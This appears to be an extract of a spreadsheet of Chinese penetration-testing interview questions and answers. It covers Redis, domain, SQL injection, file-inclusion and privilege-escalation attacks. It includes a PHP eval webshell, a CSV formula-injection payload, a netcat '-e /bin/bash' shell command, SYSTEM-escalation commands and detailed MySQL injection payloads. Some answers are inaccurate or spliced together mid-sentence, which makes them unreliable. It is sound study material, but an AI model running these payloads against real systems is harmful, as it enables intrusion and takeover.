修复方式：筛选出需要防范CSRF的页面然后嵌入Token、再次输入密码、检验Referer XXE是XML外部实体注入攻击，XML中可以通过调用实体来请求本地或者远程内容，和远程文件保护类似，会引发相关安全问题，例如敏感文件读取。
修复方式：XML解析库在调用时严格禁止对外部实体的解析。</t>
  </si>
  <si>
    <t>metasploit的用法。（信息收集，免杀，暴破，漏洞利用）</t>
  </si>
  <si>
    <t>关于metasploit的信息搜集【whois查询，nslookup，nmap，portscan，smb扫描，mssql扫描，ssh扫描，telent扫描，ftp扫描】等等：https://blog.csdn.net/mydriverc2/article/details/41990051
关于metasploit的免杀：https://app.yinxiang.com/fx/9ba626b3-1bf7-4796-88a2-4df9e83449d5
metasploit爆破【利用主机开放的一些端口服务，进而对其用户名和密码进行弱口令的爆破，例如21端口ftp服务、22端口ssh服务、23端口telnet服务、3306端口MySQL服务等。】：https://blog.csdn.net/qq_36197704/article/details/82864923
关于metasploit的漏洞利用【ms17-010，ms08-067，ms10_002 IE浏览器漏洞】：https://www.cnblogs.com/zeimao/p/12996802.html
较综合，建议看这个：https://www.cnblogs.com/zeimao/p/12996802.html</t>
  </si>
  <si>
    <t>你复现过哪些漏洞？redis有了解吗？漏洞有哪一些？</t>
  </si>
  <si>
    <t>关于漏洞复现（redit）：利用ssh-keygen公钥登陆，利用计划任务执行命令反弹shell，WEB目录写webshell；
基于主从复制的RCE；https://zhuanlan.zhihu.com/p/143347985
Redis未经授权病毒似自动攻击，攻击成功后会对内网进行扫描、控制、感染以及用来进行挖矿、勒索等恶意行为
具体链接：https://www.cnblogs.com/0daybug/p/12389138.html
redit漏洞利用（一些远程攻击）：利用redis对系统进行写文件来获取系统权限，其中包括了写一个公钥、写一个webshell、写一个计划任务。
利用metasploit对redis的密码爆破和上传文件利用
https://blog.csdn.net/itest_2016/article/details/80935633</t>
  </si>
  <si>
    <t>你编写过哪些exp？</t>
  </si>
  <si>
    <t>0-0</t>
  </si>
  <si>
    <t>你最擅长的CMS漏洞？（企业上最常见CMS）</t>
  </si>
  <si>
    <t>cmseasy漏洞：https://blog.csdn.net/shuteer_xu/article/details/106110768
（易通企业）:https://blog.csdn.net/weixin_33881140/article/details/92887648?utm_medium=distribute.pc_relevant.none-task-blog-searchFromBaidu-11.control&amp;dist_request_id=&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-searchFromBaidu-11.control
杰奇cms前端验证漏洞：https://blog.csdn.net/whatiwhere/article/details/84110647?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&amp;dist_request_id=&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control</t>
  </si>
  <si>
    <t>域渗透的攻击方式。</t>
  </si>
  <si>
    <t>第一步：信息搜集
类似：nmap扫描；
whatweb；
敏感目录扫描
日志检查
域内信息获取；
等等
第二步：漏洞利用攻击
ms08067
ms17010
第三步：木马控制；
第四步：持久化驻留
第五步：提权
第六步：密码获取；
第七步：挂代理隐藏身份
参考链接：https://blog.csdn.net/qq_20307987/article/details/85087960</t>
  </si>
  <si>
    <t>怎么样从域成员拿到域控器？</t>
  </si>
  <si>
    <t>备份域控制器夺取主域控制器，用ntdsutil强制夺取或
在额外域控制器的DOS输入ntdsutil
再输入connections
输入connection to server 你自己的服务器名字
返回quit
然后就按照下面的来做，需要夺取哪些角色
seize  domain naming master   索取域命名主机角色
seize infrastructure master 索取架构主机角色
seize pdc 索取PDC模拟主机
seize rid master 索取rid 主机
seize schema master 索取基本结构主机
其他教程：https://zhuanlan.zhihu.com/p/88786465</t>
  </si>
  <si>
    <t>通道代理了解吗？</t>
  </si>
  <si>
    <t>代理：是包相当于快递，如果是国外代理，相当于把中国的顺丰快递站，先转发的美国的快递站，然后再从美国的快递站转发出去，对外查询是美国快递，但是寄件地址还是中国【寄件地址是隐藏的】</t>
  </si>
  <si>
    <t>逻辑漏洞你了解哪些？垂直越权你一般是怎么来做的？</t>
  </si>
  <si>
    <t>三种业务逻辑漏洞
密码找回漏洞，存在密码允许暴力破解、存在通用型找回凭证、可以跳过验证步骤、找回凭证可以拦包获取等方式来通过厂商提供的密码找回功能来得到密码 
身份认证漏洞，最常见的是会话固定攻击和 Cookie 仿冒，只要得到 Session 或 Cookie 即可伪造用户身份
验证码漏洞，中存在验证码允许暴力破解、验证码可以通过 Javascript 或者改包的方法来进行绕过 
逻辑漏洞就是指攻击者利用业务的设计缺陷，获取敏感信息或破坏业务的完整性。
一般出现在密码修改，越权访问，密码找回，交易支付金额等功能处。
越权漏洞是，攻击着利用在检查授权时出现的纰漏，通过一些绕过手段获得更高权限，从而进行访问，修改，删除等操作其他用户甚至更高权限的数据。
参考链接：https://www.freebuf.com/vuls/112339.html【实战逻辑漏洞】</t>
  </si>
  <si>
    <t>文件上传漏洞了解吗？怎么防御？解析漏洞和文件上传漏洞有什么区别和共同点？</t>
  </si>
  <si>
    <t>一些web应用程序中允许上传图片，文本或者其他资源到指定的位置，文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中，再通过url去访问以执行代码  
链接：https://blog.csdn.net/syfsjhivan/article/details/90323443
对于上传文件的后缀名（扩展名）没有做较为严格的限制
对于上传文件的MIMETYPE 没有做检查
权限上没有对于上传的文件的文件权限，（尤其是对于shebang类型的文件）
对于web server对于上传文件或者指定目录的行为没有做限制
防御方式：
前端限制：onsumbit=check()调用js函数来检查上传文件的扩展名，但是会被前端直接编辑即可入侵
检查扩展名：白名单策略
解析漏洞利用及防御：https://blog.csdn.net/syfsjhivan/article/details/90323443</t>
  </si>
  <si>
    <t>csv远程命令注入是什么？简述一下你发现的csv漏洞？</t>
  </si>
  <si>
    <t>指令：
=1+cmd'/c（后续指令代码
=1+cmd|' /C calc'!A0  //测试漏洞代码：执行 cmd 弹出计算器：
CSV公式注入(CSV Injection）是一种会造成巨大影响的攻击向量。攻击包含向恶意的EXCEL公式中注入可以输出或以CSV文件读取的参数。当在Excel中打开CSV文件时，文件会从CSV描述转变为原始的Excel格式，包括Excel提供的所有动态功能。在这个过程中，CSV中的所有Excel公式都会执行。当该函数有合法意图时，很易被滥用并允许恶意代码执行。
https://blog.csdn.net/qq_34304003/article/details/87635582</t>
  </si>
  <si>
    <t>你了解php一句话木马的原理吗？</t>
  </si>
  <si>
    <t>利用eval函数原理，执行恶意PHP代码：eval() 函数把字符串按照 PHP 代码来计算。（eval($_GET["cmd"]);）</t>
  </si>
  <si>
    <t>你用过哪些扫描器来扫描过?它们扫描的机制和原理你了解吗？</t>
  </si>
  <si>
    <t>nmap：http://www.h3c.com/cn/d_201508/888907_30008_0.htm
sqlmap：https://www.cnblogs.com/milantgh/p/3631245.html  //大致可以相当于脚本测试</t>
  </si>
  <si>
    <t>你写过哪些exp，可以叙述一下吗？</t>
  </si>
  <si>
    <t>metasploit你了解吗？平时一般是怎么使用它的？它除了可以利用漏洞还可以做什么？meterpreter你了解吗？用meterpreter拿到shell背后的原理你了解吗？</t>
  </si>
  <si>
    <t>可以自动提权；生成木马；漏洞利用（如ms17-010永恒之蓝）；提供payload</t>
  </si>
  <si>
    <t>你了解过华为的扫描工具吗？</t>
  </si>
  <si>
    <t>华为云扫描——端口扫描，云漏洞库扫描，sql注入扫描等等
https://www.huaweicloud.com/theme/90523-1-H-undefined（总介绍网页）
举例：
漏洞服务扫描具有OWASP TOP10和WASC的漏洞检测能力，支持扫描22种类型以上的漏洞
https://support.huaweicloud.com/vss/index.html</t>
  </si>
  <si>
    <t>内网你大概了解多少？内网渗透的思路是什么？LDPA是什么？内网穿透有横向和纵向，你知道其中的区别吗？</t>
  </si>
  <si>
    <t xml:space="preserve">
内网：分配IP，都是由路由器分配的;
覆盖范围小；
网络安全性较高；
内网渗透思路过程可以参考网络测速渗透过程：
https://app.yinxiang.com/fx/35c7b305-632b-4332-9b62-6d826a0e9325
LDAP（Light Directory Access Portocol），它是基于X.500标准的轻量级目录访问协议。
目录是一个为查询、浏览和搜索而优化的数据库，它成树状结构组织数据，类似文件目录一样。
目录数据库和关系数据库不同，它有优异的读性能，但写性能差，并且没有事务处理、回滚等复杂功能，不适于存储修改频繁的数据。所以目录天生是用来查询的，就好象它的名字一样。
LDAP目录服务是由目录数据库和一套访问协议组成的系统。
横向渗透：就是在已经攻占部分内网主机的前提下，利用既有的资源尝试获取更多的凭据、更高的权限，进而达到控制整个内网、拥有最高权限、发动 APT （高级持续性威胁攻击）的目的
参考链接：https://www.cnblogs.com/-chenxs/p/12318448.html
纵向渗透：https://www.77169.net/html/241014.html</t>
  </si>
  <si>
    <t>mysql注入过程中各种常用关键词基本都被过滤后，如何进行注入？</t>
  </si>
  <si>
    <t xml:space="preserve">情况一：空格被过滤
使用括号()代替空格，任何可以计算出结果的语句，都可以用括号包围起来；
情况二：限制from与某种字符组合
在from后加个点.即使用from.来代替from；
https://blog.csdn.net/weixin_33364018/article/details/113722893
有较多情况：还有关键词被过滤，可以尝试不同编码；
最简单也可以试试在前端元素审查看看会不会过滤之类；
</t>
  </si>
  <si>
    <t>任意重置密码的几种后端处理逻辑？</t>
  </si>
  <si>
    <t xml:space="preserve">https://blog.csdn.net/qq_35569814/article/details/100743300
基于修改密码的有三种，
基于找回密码的，一般找回密码的都是验证码问题，或者可以直接跳过验证码的
</t>
  </si>
  <si>
    <t>讲下BURP抓取https的数据包的原理？</t>
  </si>
  <si>
    <t xml:space="preserve"> CSRF和XSS的区别？</t>
  </si>
  <si>
    <t>CSRF是跨站请求伪造攻击，由客户端发起,无需cookie而是直接冒充用户操作。XSS是跨站脚本攻击，盗取Cookie，需要引诱用户点击</t>
  </si>
  <si>
    <t>同源策略是什么和CSP的绕过？</t>
  </si>
  <si>
    <t>针对单一域名挂了CDN的IP绕过？</t>
  </si>
  <si>
    <t>使用国外ping，有的CDN只针对国内，或者使用fofa进行搜索。还有可以使用github上fucakcdn工具</t>
  </si>
  <si>
    <t>MYSQL的注入绕过？</t>
  </si>
  <si>
    <t>可以大小写、加解密、编码、更改提交方式、注释符混用，垃圾数据填充，HTTP污染（一般是POST请求）</t>
  </si>
  <si>
    <t>OWASP 10的了解？</t>
  </si>
  <si>
    <t>1.注入
包括但不限于SQL注入、cookie注入、xxe注入等，都是开发者忽略了客户端对数据库的恶意代码拼接读取造成的危害。导致攻击者执行任意sql语句获取权限
2.失效的身份认证和会话管理
SSO单点登录，cookie相关信息显示在url内或是未经允许即可访问部分或全部用户信息。
3.跨站脚本语言攻击(XSS)
跨站脚本语言，经常发生在输入框、留言板、评论区等输入框，存在三种分类：反射性、DOM型、存储型。常见的攻击盗取Cookie、钓鱼等
4.不安全的对象直接引用
类似于常见的业务逻辑漏洞，越权访问其他人账号信息等。
5.跨站请求伪造(CSRF)
CSRF跨站请求伪造：通过模拟真实页面信息让用户点击访问，可直接对用户进行操作。
6.安全错误配置
管理员对服务器配置不当，开启了不应该开启的配置，导致存在的大部分敏感信息泄露。
7.限制URL访问失败
用户通过简单的修改url内post或者get请求参数即可达到超级访问。
8.未验证的重定向和转发
302或301直接跳转到用户自己想访问的网站。如网站管理员禁止403页面，跳转功能可用于钓鱼。
9.应用已知脆弱性的组件
应该携带漏洞插件。
10.敏感信息泄露
将用户身份证或手机号直接在网页显示。</t>
  </si>
  <si>
    <t>http-only的绕过方法？</t>
  </si>
  <si>
    <t>http-only只是防止盗取cookie，并不代表不会执行xss代码，可以通过弹窗钓鱼。</t>
  </si>
  <si>
    <t>mssql在外/内网的情况下的利用 和 存在杀毒/站库分离的情况下如何渗透？</t>
  </si>
  <si>
    <t>工作组渗透 和 域渗透的过程 信息搜集 都是如何的， 讲一次关于自己的渗透过程？</t>
  </si>
  <si>
    <t>讲一次多个漏洞配合最后拿下目标的经历？</t>
  </si>
  <si>
    <t>讲下你对静态免杀和动态免杀的看法，以及你自己一般都是如何去实现免杀的，你免杀能过多少个杀毒，如果是静态免杀的话 你一般都怎么做？</t>
  </si>
  <si>
    <t>对黑产和灰产有了解吗？</t>
  </si>
  <si>
    <t>我的理解，黑产的话是卖用户信息，数据资料，未公开漏洞。灰厂的话类似于羊毛党。</t>
  </si>
  <si>
    <t>PHP的反序列化的了解，以及如何去挖掘反序列化？</t>
  </si>
  <si>
    <t>讲一下在渗透过程中的注意事项？</t>
  </si>
  <si>
    <t xml:space="preserve">不随意修改管理员密码、后台密码。
大文件需要打包分割下载。
不使用国内VPS（阿里云、腾讯云）做CobaltStrike远控服务器
</t>
  </si>
  <si>
    <t>是否有用PHP写过一套简单的增删改查吗？</t>
  </si>
  <si>
    <t>一般渗透过程中你是否s会利用一些自动化的工具来帮助渗透，一般都是如何利用的？</t>
  </si>
  <si>
    <t>redis的多种高低权限的利用？</t>
  </si>
  <si>
    <t>ssrf一般都是如何利用的？过程是如何？</t>
  </si>
  <si>
    <t>当只拿到了数据库的账号密码 无法进行解密要如何进行操作？</t>
  </si>
  <si>
    <t>当域控发生故障之后 域账户还能进行登陆吗？</t>
  </si>
  <si>
    <t>可以登录默认情况下可以缓存10个账号登录信息进行登录使用。如果更改策略就无法进行登录</t>
  </si>
  <si>
    <t>域控中有几种方法进行导出域哈希？ 域中什么样的用户拥有DCSync权限？？</t>
  </si>
  <si>
    <t>讲述下你知道的域内权限维持的方法？....再讲述下你对黄金票据的实现条件 和 该后门存活的有效期？</t>
  </si>
  <si>
    <t>讲述你在拿到一个webshell之后进行的处理？</t>
  </si>
  <si>
    <t>讲述你拿到一个webshell之后 如何确定域环境是否存在？</t>
  </si>
  <si>
    <t>讲述你对windows提权的方面和方法，linux提权的方面和方法？</t>
  </si>
  <si>
    <t>Windows 提权
第一种方法：系统漏洞提权
通过Webshell命令行执行systeminfo命令查看系统是否打了提权补丁，未打补丁的系统可Linux系统提权方法
1、 首先通过uname –a查看linux版本号，根据linux版本号到kail里面通过searchsploit linux XX系统 版本号找出对应的exp进行提权或根据版本号到github上面下载对应的exp编译运行提权。
2、 通过通杀linux的方法测试一下脏牛提权
3、 直接suid提权，先通过以下三行命令找出具有本地查找符合条件具备root权限的suid文件，如：/usr/bin/find examples.desktop -exec whoami ;
find / -user root -perm -4000 -print 2&gt;/dev/null
find / -perm -u=s -type f 2&gt;/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
通过github下载系统提权漏洞exp进行提权，如KB2592799、KB3000061、KB2592799等。
2、通过Webshell找网站读写执行目录，把cs马或提权exp上传到对方服务器（如果cmd无法执行命令可单独上传cmd.exe到对方服务器，菜刀终端设置为setp c:\XXX\cmd.exe）
第二种方法：sc命令提权（administrator–&gt;system）
例如：sc Create syscmd binPath= “cmd /K start” type= own type= interact
sc start systcmd，就得到了一个system权限的cmd环境
第三种方法：不带引号的服务路径
当服务路径带空格的时候，路径空格目录前面一断就会当作文件执行，如C:\Program Files\MSBuild这个目录，攻击者只要在c盘创建名为Program.exe的木马，最后只要系统重启就会执行C:\Program.exe文件。
第五种方法：绕过系统UAC提升
可通过msf里面的getsystem绕过UAC,也可以通过kail模块的exploit/windows/local/bypassuac_injection、exploit/windows/local/bypassuac_vbs
、exploit/windows/local/ask绕过UAC</t>
  </si>
  <si>
    <t>讲述你如何对一个公司如何进行信息搜集？</t>
  </si>
  <si>
    <t>讲述你php如何进行代码审计？是否挖掘过反序列化？如何挖掘反序列化的漏洞？</t>
  </si>
  <si>
    <t>https://www.jianshu.com/p/aca81913f874</t>
  </si>
  <si>
    <t>讲述下Mysql注入的时候可以利用的数据库特性？</t>
  </si>
  <si>
    <t>insert 注入
insert时间盲注
先考虑这样一种注入情况，很多网站都会把访问者的IP记录到数据库中，而且是从HTTP头的X-FORWARDED-FOR或CLIENT-IP等用户可控的字段获取，这样的话，如果没有对获取的IP进行合法性验证就插入数据库就会产生SQL注入。插入数据库的IP值一般用户不可见，一般也不会产生二次注入，所以我们只能在insert语句中构造时间盲注语句才能利用此漏洞。
&lt;?php
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
$con = mysql_connect("localhost","root","root");
mysql_select_db("test", $con);
$query = "insert into `guest` values(null,'$ip');";
$result = mysql_query($query);
echo $query;
mysql_close($con);
?&gt;
利用if条件构造时间盲注即可提取数据！
构造如下payload利用漏洞：
insert into `guest` values(null,''-(if((substr(version(),1,1)='5'),sleep(5),1))-'');
insert多行插入
&lt;?php
$username = $_POST['username'];
$passowrd = $_POST['password'];
$passowrd = md5($passowrd);
$con = mysql_connect("localhost","root","root");
mysql_select_db("test", $con);
$query = "insert into `users` values(null,0,'$username','$passowrd');";
$result = mysql_query($query);
echo $query;
mysql_close($con);
?&gt;
is_admin字段如果为1则代表为管理员用户，为0是普通用户
很明显username参数存在注入，可以利用part 1提到的时间盲注方法提取数据，但是如果我们利用盲注提取到的md5加密后的管理员密码无法破解怎么办？是否还有更好的利用方法？
我们可以利用insert语句的多行插入方式来利用此漏洞
构造如下payload利用漏洞：
insert into `users` values(null,0,'1','1'),(null,1,'cesafe','e10adc3949ba59abbe56e057f20f883e');
insert更新插入
继续看Part 2的例子，在很多情况下记录用户权限是用的单独的一个数据表而不是直接在users数据表中增加一个is_admin字段。在这种情况下直接利用insert语句插入一个管理员用户是不可能实现的，脑洞在开大一点，在这种情况下还有什么奇淫绝技吗？
看一下代码和数据表结构：
&lt;?php
$username = $_POST['username'];
$passowrd = $_POST['password'];
$passowrd = md5($passowrd);
$con = mysql_connect("localhost","root","root");
mysql_select_db("test", $con);
$query = "insert into `users` values(null,'$username','$passowrd');";
$result = mysql_query($query);
echo $query;
mysql_close($con);
?&gt;
在当前数据表中有一个管理员用户，在记录权限的数据表中记录主键id=1的用户拥有管理员权限。
因为只有主键id=1的用户拥有管理员权限，所以我们不可能通过insert注入插入一个管理员用户。
既然不可能插入管理员用户，那我们能不能update管理员用户的密码呢？
这是我们就要用到一个叫做“更新插入”的技巧，即当插入的数据与已有数据主键冲突时，可以利用on duplicate key语法来更新数据值。
构造如下payload利用漏洞：
insert into `users` values(null,'guest','guest'),(1,'admin','123') on duplicate key update password = 'reset_pwd';
Update注入
对于update注入，如果update后的数据值用户可见那么直接把敏感数据update到数据库，之后查看即可，如果不可见,那么利用前面提到的时间盲注也可以提取数据。
但是如果注入点是在数据表那里呢？看一下phithon牛出的一道题：
&lt;?php
$link = mysqli_connect('localhost', 'root', 'root');
mysqli_select_db($link, 'code');
$table = addslashes($_GET['table']);
$sql = "UPDATE `{$table}`
 SET `username`='admin'
 WHERE id=1";
if(!mysqli_query($link, $sql)) {
 echo(mysqli_error($link));
}
mysqli_close($link);
这道题最大的一个坑是整个update语句被分成了三行，不能用单行注释把后面的语句注释掉，必须构造出一个完整的SQL语句。要解决这道题，我们要利用到
Mysql跨表更新，通过join语句引入一个select子查询来利用漏洞。
Payload为如下SQL语句：
update `table` t join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=`t.username`
set username ='admin'
where id=1;
Select注入
关于时间盲注的另类奇淫绝技
对于时间盲注，我们一般都会通过sleep()或benchmark()函数构造时间延迟，但是如果sleep和benchmark关键字被过滤掉了该怎么办？
利用思路：
1.让两个非常大的数据表做笛卡尔积产生大量的计算从而产生时间延迟
2.如果服务器端采用长连接的话可以利用Mysql的锁机制即Get_lock()
3.利用复杂的正则表达式去匹配一个超长字符串来产生时间延迟
看一下我研究出来的Payload：
 select(repeat(0x7a,999999)regexp(concat(0x5e,repeat(0x28,20),0x7a,repeat(0x292a,20),0x24)));
直接利用Mysql的repeat()函数即可构造超长字符串，同理可以构造一个复杂的正则表达式，而且Mysql的字符串可以直接使用十六进制数据代替，这样就可以避免使用引号从避免被一些WAF拦截。
当然了，如果Mysql版本比较低的话，还可以直接利用带外通道获取数据。在Mysql 5.5.53之前的版本，默认可以使用load_file()读取数据，而且load_file()支持UNC路径，因此可以利用DNS解析来向外传输数据（结合exeye平台效果更佳），当然了，如果into outfile可以使用的话就直接getshell好了。</t>
  </si>
  <si>
    <t>讲述在域中如何快速得到域控的权限？</t>
  </si>
  <si>
    <t>https://www.anquanke.com/post/id/84975</t>
  </si>
  <si>
    <t>为什么system权限下还需要降权处理？</t>
  </si>
  <si>
    <t>system权限如果进行降权处理？</t>
  </si>
  <si>
    <t>https://www.it610.com/article/4785892.htm</t>
  </si>
  <si>
    <t>如何从管理员权限提权到system权限？</t>
  </si>
  <si>
    <t>https://blog.csdn.net/equationdz/article/details/2519230?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.control&amp;dist_request_id=&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.control</t>
  </si>
  <si>
    <t>域/工作组维持权限的方法有什么， 你一般用的都是哪几种方法，你都试过吗？</t>
  </si>
  <si>
    <t>https://blog.csdn.net/wsnbbz/article/details/105286840</t>
  </si>
  <si>
    <t>如何快速拿到域控权限？</t>
  </si>
  <si>
    <t>横向的方法有什么？工具有什么？大概的流程讲下？</t>
  </si>
  <si>
    <t>横向渗透，就是在已经攻占部分内网主机的前提下，利用既有的资源尝试获取更多的凭据、更高的权限，进而达到控制整个内网、拥有最高权限、发动 APT （高级持续性威胁攻击）的目的。
paexec
wmi
(1)wmic (2)wmiexec.vbs (3)Invoke-WMIMethod
WinRM
DCOM
WCE
组策略种马</t>
  </si>
  <si>
    <t>如果快速打点 要从哪几个方面？</t>
  </si>
  <si>
    <t>如果几百个域名 如何快速确定cms的类型 如何确定之后下一步该如何</t>
  </si>
  <si>
    <t>使用工具
AWVS
WWWSCAN
whatweb
googlehack</t>
  </si>
  <si>
    <t>对于邮箱搜集你一般都如何操作？如果你进到对方人员的邮箱中 你会怎么做？ 从哪几个方面下手？</t>
  </si>
  <si>
    <t>内网/外网有什么有趣的经历吗？</t>
  </si>
  <si>
    <t>在域中你一般有用到什么cmd命令有什么？</t>
  </si>
  <si>
    <t>gpedit.msc－－－－－--------------------组策略
sndrec32－－－－－－－------------------录音机
nslookup－－－－－－－------------------ip地址侦测器
explorer－－－－－－－------------------打开资源管理器
logoff－－－－－－－－------------------注销命令
tsshutdn－－－－－－－------------------60秒倒计时关机命令
lusrmgr.msc－－－－---------------------本机用户和组
services.msc－－－----------------------本地服务设置
oobe/msoobe /a－－－－------------------检查xp是否激活
notepad－－－－－－－-------------------打开记事本
cleanmgr－－－－－－－------------------垃圾整理
net start messenger－－－－-------------开始信使服务
compmgmt.msc－－－----------------------计算机管理
net stop messenger－－－－－------------停止信使服务
conf－－－－－－－－－－－--------------启动
dvdplay－－－－－－－－-----------------dvd播放器
charmap－－－－－－－－-----------------启动字符映射表
diskmgmt.msc－－－----------------------磁盘管理实用程序
calc－－－－－－－－－－－--------------启动计算器
dfrg.msc－－－－－－－------------------磁盘碎片整理程序
chkdsk.exe－－－－－--------------------chkdsk磁盘检查
devmgmt.msc－－－ ----------------------设备管理器
regsvr32 /u *.dll－－－－---------------停止dll文件运行
drwtsn32－－－－－－ -------------------系统医生
rononce －p －－－－--------------------15秒关机
dxdiag－－－－－－－－－----------------检查directx信息
regedt32－－－－－－－------------------注册表编辑器
msconfig.exe－－－----------------------系统配置实用程序
rsop.msc－－－－－－－------------------组策略结果集
mem.exe－－－－－－－－-----------------显示内存使用情况
regedit.exe－－－－---------------------注册表
winchat－－－－－－－－-----------------xp自带局域网聊天
progman－－－－－－－－-----------------程序管理器
winmsd－－－－－－－－－----------------系统信息
perfmon.msc－－－－---------------------计算机性能监测程序
winver－－－－－－－－－----------------检查windows版本
sfc /scannow－－－－－------------------扫描错误并复原
winver－－－－－－－－－----------------检查windows版本
wmimgmt.msc－－－－---------------------打开windows管理体系结构
wupdmgr－－－－－－－－-----------------windows更新程序
w脚本－－－－－－－－-------------------windows脚本宿主设置
write－－－－－－－－－－---------------写字板
winmsd－－－－－－－－－----------------系统信息
wiaacmgr－－－－－－－------------------扫描仪和照相机向导
winchat－－－－－－－－-----------------xp自带局域网聊天
mem.exe－－－－－－－－-----------------显示内存使用情况
msconfig.exe－－－----------------------系统配置实用程序
mplayer2－－－－－－－------------------简易
mspaint－－－－－－－－-----------------画图板
mstsc－－－－－－－－－－---------------远程桌面连接
mplayer2－－－－－－－------------------媒体播放机
magnify－－－－－－－－-----------------放大镜实用程序
mmc－－－－－－－－－－－－-------------打开控制台
mobsync－－－－－－－－-----------------同步命令
dxdiag－－－－－－－－－----------------检查directx信息
drwtsn32－－－－－－------------------- 系统医生</t>
  </si>
  <si>
    <t>对linux了解吗？</t>
  </si>
  <si>
    <t>https://blog.csdn.net/dmzing/article/details/52404455</t>
  </si>
  <si>
    <t>xss和csrf的区别 xsrf的应用举例</t>
  </si>
  <si>
    <t>CSRF 和 XSS 的区别
区别一：
CSRF：需要用户先登录网站A，获取 cookie。XSS：不需要登录。
区别二：（原理的区别）
CSRF：是利用网站A本身的漏洞，去请求网站A的api。XSS：是向网站 A 注入 JS代码，然后执行 JS 里的代码，篡改网站A的内容。</t>
  </si>
  <si>
    <t>对钓鱼有没有了解过？有没有应用过？</t>
  </si>
  <si>
    <t>https://zhuanlan.zhihu.com/p/86067226</t>
  </si>
  <si>
    <t>有没有什么有意思的权限维持 可以说下？</t>
  </si>
  <si>
    <t>免杀的话你了解多少？你讲的方法都有在实战用过吗？一般应用的都是在哪几个方面？</t>
  </si>
  <si>
    <t>https://blog.csdn.net/weixin_33720956/article/details/93997626</t>
  </si>
  <si>
    <t>在域/工作组中如何探测环境的？讲下你的方法？</t>
  </si>
  <si>
    <t>1、php的本地包含漏洞原理是什么？写一段带有漏洞的代码。手工的话如何发掘？如果无报错回显，你是怎么遍历文件的？</t>
  </si>
  <si>
    <t>if ($_GET['file']){include $_GET['file'];}
包含的文件设置为变量，并且无过滤导致可以调用恶意文件 还可以对远程文件包含，但需要开启allow_url_include = ON 通过测试参数的地方进行本地文件/etc/passwd等包含 如何存在漏洞而且没有回显，有可能没有显示在页面而是在网页源代码中，除些可以利用DNSlog进行获取包含的信息。从index.php文件一级级往读取 也可以利用PHP封装协议读取文件</t>
  </si>
  <si>
    <t>说说常见的中间件解析漏洞利用方式</t>
  </si>
  <si>
    <t>IIS 6.0
/xx.asp/xx.jpg "xx.asp"是文件夹名
IIS 7.0/7.5
默认Fast-CGI开启，直接在url中图片地址后面输入/1.php，会把正常图片当成php解析
Nginx
版本小于等于0.8.37，利用方法和IIS 7.0/7.5一样，Fast-CGI关闭情况下也可利用。
空字节代码 xxx.jpg%00.php
Apache
上传的文件命名为：test.php.x1.x2.x3，Apache是从右往左判断后缀</t>
  </si>
  <si>
    <t>mysql的用户名密码是存放在那张表里面？mysql密码采用哪种加密方式？</t>
  </si>
  <si>
    <t>mysql -&gt; users
SHA1</t>
  </si>
  <si>
    <t>Windows、Linux、数据库的加固降权思路，任选其一</t>
  </si>
  <si>
    <t>禁用root
禁止远程访问
禁止写入
单独帐号
禁止执行system等函数</t>
  </si>
  <si>
    <t>你使用什么工具来判断系统是否存在后门</t>
  </si>
  <si>
    <t>Chkrootkit
Rkhunter</t>
  </si>
  <si>
    <t>如何绕过CDN获取目标网站真实IP，谈谈你的思路？</t>
  </si>
  <si>
    <t>类似phpinfo、网站信息
C段、子域名
历史解析记录
DDOS
zmap全网扫描识别http头
网站域名管理员邮箱，注册过的域名等相关信息关联</t>
  </si>
  <si>
    <t>如果给你一个网站,你的渗透测试思路是什么? 在获取书面授权的前提下。</t>
  </si>
  <si>
    <t>其实这是一个非常大的话题，渗透大部分思路都是如此，而面试官是想听到你回答不一样的答案让人眼前一亮 如何才做到让人眼前一亮都需要看你的经验，把你实践的过程拿出来说，以及遇到什么问题如何解决，最终取得成果 渗透其它大同小异,而做为渗透者知识的储备、基础扎实、耐心、细心都是必不可少。</t>
  </si>
  <si>
    <t>谈一谈Windows系统与Linux系统提权的思路？</t>
  </si>
  <si>
    <t>Windows
Windows服务比较多所以方法也如此，最基本的就是Exp提权，数据库SQLServer、MYSQL UDF等、第三方软件提权。
除此之外提权的成功与否和在于信息收集也非常重要，你对这台服务器和管理员了解多少
Linux
Linux也是类似，除了EXP或者高版本的内核无法提权之外，通过第三方软件和服务，除了提权也可以考虑把这台机器当跳版,
达到先进入内网安全防线最弱的地方寻找有用的信息，再迂回战术。
linux权限提升：
Brief
枚举脚本
以root权限运行的程序
用户安装的软件
弱口令或者明文密码
只能内部访问的服务
suid和guid错误配置
滥用sudo权限
以root权限运行的脚本文件
错误的路径配置
计划任务
未挂载的文件系统
NFS共享
通过键盘记录仪窃取密码
其它有用的和提权相关的东西
内核提权</t>
  </si>
  <si>
    <t>列举出您所知道的所有开源组件高危漏洞(十个以上)</t>
  </si>
  <si>
    <t>Tomcat
Nginx
Apache
Hadhoop
Docker
Jenkins
Zenoss
Jboss
MongoDB
Redis
GlassFish</t>
  </si>
  <si>
    <t>反弹 shell 的常用命令？一般常反弹哪一种 shell？为什么？</t>
  </si>
  <si>
    <t>nc -lvvp 7777 -e /bin/bash
bash是交互式,否则像useradd无法执行交互</t>
  </si>
  <si>
    <t>CMD命令行如何查询远程终端开放端口</t>
  </si>
  <si>
    <t>tasklist /svc
netstat -ano</t>
  </si>
  <si>
    <t>服务器为IIS+PHP+MySQL，发现root权限注入漏洞，讲讲你的渗透思路</t>
  </si>
  <si>
    <t>可以读取IIS信息，知道路径,如果像WAMMP类似构建，通过@@datadir知道数据库路径也可以猜测网站路径。
或者直接写Shell</t>
  </si>
  <si>
    <t>JWT（json web token）攻击手法（头部、负载、签名）？</t>
  </si>
  <si>
    <t>未校验签名 解码后换内容再编码
禁用哈希 算法修改为 none
暴破弱密钥
操纵 Key ID 原因是 key ID 里的内容可能被作为参数进数据库或者查询 （SQL 注入、
目录遍历、命令注入）</t>
  </si>
  <si>
    <t>如何实现跨域？</t>
  </si>
  <si>
    <t>jsonp 跨域
CORS 跨域
